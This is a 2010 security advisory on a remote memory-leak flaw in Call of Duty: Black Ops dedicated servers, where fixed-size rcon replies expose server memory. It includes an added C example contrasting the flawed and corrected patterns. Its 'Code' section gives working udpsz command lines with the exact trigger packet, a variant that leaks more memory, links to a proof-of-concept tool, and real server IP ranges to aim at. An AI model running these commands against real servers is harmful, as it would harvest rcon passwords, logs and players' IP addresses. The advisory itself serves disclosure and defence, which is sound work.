
Call Of Duty: Black Ops Memory Leak

Posted Dec 3, 2010
Authored by Luigi Auriemma | Site aluigi.org

Call of Duty: Black Ops suffers from a remote memory leak vulnerability.

tags | advisory, remote, memory leak
SHA-256 | 23f747fc13e4561d98d08374160cabdd2ae8c84df6b37dd2a2b12bf9451bf8d1

#######################################################################

Luigi Auriemma

Application: Call of Duty: Black Ops
http://www.callofduty.com
Versions: unknown, refer to the release date of this advisory
Platforms: unknown (it should be Windows)
Bug: memory leak
Exploitation: remote, versus server
Date: 18 Nov 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Call of Duty Black Ops (cod7) is the new game of the CoD series.
Just like cod6, this one is also distributed as "client-only", which
means that a normal user cannot host a server.
Only some hosting companies (GameServers) or Treyarch itself can host
dedicated servers.


#######################################################################

======
2) Bug
======


When the server receives an rcon packet (opcode 0x00) it replies with
a packet having a fixed size of 1168 bytes, regardless of whether its
content is smaller.

The result is that various parts of the server's memory are disclosed
remotely to anyone, and through the continuous sending of these invalid
rcon packets it is possible to monitor the server and maybe retrieve
important information like the value of cvars (rcon included), parts
of the logs (including the output of the admin's previous rcon
packets), parts of the server's configuration and the IP addresses of
the other players.
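
The pattern described above beside its correction, as an added example
that is not part of the original advisory and is not the game's code.
Only the 1168-byte reply size comes from the advisory; the buffer, the
function names and the strings are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#define REPLY_SIZE 1168 /* fixed reply size reported in the advisory */

/* Hypothetical long-lived reply buffer; the real server layout is unknown. */
static unsigned char reply_buf[REPLY_SIZE];

/* Constructed stand-in for data left behind by earlier server activity. */
static void simulate_previous_use(void) {
    memset(reply_buf, 0, sizeof reply_buf);
    snprintf((char *)reply_buf + 64, 64, "rcon_password constructed-secret");
}

/* Writes msg (NUL-terminated, truncated if needed); returns bytes used. */
static size_t write_msg(const char *msg) {
    int n = snprintf((char *)reply_buf, sizeof reply_buf, "%s", msg);
    if (n < 0) { reply_buf[0] = '\0'; return 1; }
    return ((size_t)n >= sizeof reply_buf ? sizeof reply_buf - 1 : (size_t)n) + 1;
}

/* Flawed pattern: the send length is the buffer size, not the content size. */
size_t build_reply_fixed(const char *msg, unsigned char *out) {
    write_msg(msg);
    memcpy(out, reply_buf, REPLY_SIZE);
    return REPLY_SIZE;
}

/* Corrected pattern: send only the bytes written, then scrub the buffer. */
size_t build_reply_sized(const char *msg, unsigned char *out) {
    size_t n = write_msg(msg);
    memcpy(out, reply_buf, n);
    memset(reply_buf, 0, sizeof reply_buf);
    return n;
}

/* Counts non-zero bytes after the first NUL: data the reply should not carry. */
size_t stale_bytes(const unsigned char *pkt, size_t len) {
    const unsigned char *p = memchr(pkt, 0, len);
    size_t count = 0;
    for (; p && p < pkt + len; p++) count += (*p != 0);
    return count;
}

int main(void) {
    unsigned char out[REPLY_SIZE];
    simulate_previous_use();
    size_t a = build_reply_fixed("constructed short reply", out);
    printf("fixed: %zu bytes sent, %zu stale\n", a, stale_bytes(out, a));
    size_t b = build_reply_sized("constructed short reply", out);
    printf("sized: %zu bytes sent, %zu stale\n", b, stale_bytes(out, b));
}
```

The stale_bytes() check can also be applied to a captured reply to
confirm whether a server still pads its answers with leftover memory.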


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/cod7mem.zip

udpsz -C "ffffffff 00 0000000000000000" -D SERVER 3074 -1

or with the filter for easier visualization and monitoring:

udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll SERVER 3074 -1

For example, the Treyarch servers are available in a certain range that
covers different class C networks like 173.199.77.x, 173.199.78.x,
173.199.79.x and so on.

It's possible to use "ffffffff 00 6100000000000000" to receive a
reply string shorter than 50 bytes, making more memory visible, but I
don't know if it will appear in the server's logs because it could be
considered a password guessing attack.


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

